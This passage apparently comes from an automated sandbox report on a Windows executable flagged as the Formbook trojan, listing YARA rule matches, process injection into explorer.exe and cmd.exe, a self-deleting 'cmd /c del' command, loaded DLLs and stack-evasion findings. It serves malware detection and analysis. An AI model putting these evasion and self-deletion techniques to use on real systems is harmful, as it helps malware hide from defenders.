          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB89124_2_03AB8912
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB10824_2_03AB1082
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABE5CD4_2_03ABE5CD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB2D024_2_03AB2D02
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03C4EA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03C15130 appears 58 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03BCB970 appears 262 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03C5F290 appears 103 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03C27E54 appears 99 times
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: String function: 017CEA12 appears 86 times
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: String function: 017DF290 appears 103 times
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: String function: 01795130 appears 58 times
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: String function: 017A7E54 appears 107 times
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: String function: 0174B970 appears 262 times
          Source: n0srYVYMDI.exe, 00000000.00000002.1730830039.0000000007C70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exe, 00000000.00000002.1725254905.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exe, 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exe, 00000000.00000000.1698934984.0000000000F22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNXaN.exe8 vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exe, 00000002.00000002.1787623438.00000000016DE000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exe, 00000002.00000002.1787974045.000000000184D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exeBinary or memory string: OriginalFilenameNXaN.exe8 vs n0srYVYMDI.exe
          Source: n0srYVYMDI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7516, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmd.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: n0srYVYMDI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@12/1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026A759 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,4_2_0026A759
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n0srYVYMDI.exe.logJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
          Source: n0srYVYMDI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: n0srYVYMDI.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: n0srYVYMDI.exeVirustotal: Detection: 70%
          Source: n0srYVYMDI.exeReversingLabs: Detection: 82%
          Source: unknownProcess created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\n0srYVYMDI.exe"Jump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: n0srYVYMDI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: n0srYVYMDI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmd.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: n0srYVYMDI.exe, n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041B854 push edi; ret 2_2_0041B85C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041E96F push ebp; ret 2_2_0041E986
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041E903 push edx; ret 2_2_0041E907
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017509AD push ecx; mov dword ptr [esp], ecx2_2_017509B6
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB00B1E push esp; retn 0000h3_2_0FB00B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB00B02 push esp; retn 0000h3_2_0FB00B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB009B5 push esp; retn 0000h3_2_0FB00AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC69B5 push esp; retn 0000h3_2_10DC6AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC6B1E push esp; retn 0000h3_2_10DC6B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC6B02 push esp; retn 0000h3_2_10DC6B03
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002571ED push ecx; ret 4_2_00257200
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0025722B push ecx; ret 4_2_0025723E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BD09AD push ecx; mov dword ptr [esp], ecx4_2_03BD09B6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7D4C2 push eax; ret 4_2_02F7D4C8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7D4CB push eax; ret 4_2_02F7D532
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7D475 push eax; ret 4_2_02F7D4C8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7D52C push eax; ret 4_2_02F7D532
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7B854 push edi; ret 4_2_02F7B85C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7E96F push ebp; ret 4_2_02F7E986
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7E903 push edx; ret 4_2_02F7E907
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABEB02 push esp; retn 0000h4_2_03ABEB03
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABEB1E push esp; retn 0000h4_2_03ABEB1F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABE9B5 push esp; retn 0000h4_2_03ABEAE7
          Source: n0srYVYMDI.exeStatic PE information: section name: .text entropy: 7.718614846166296
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
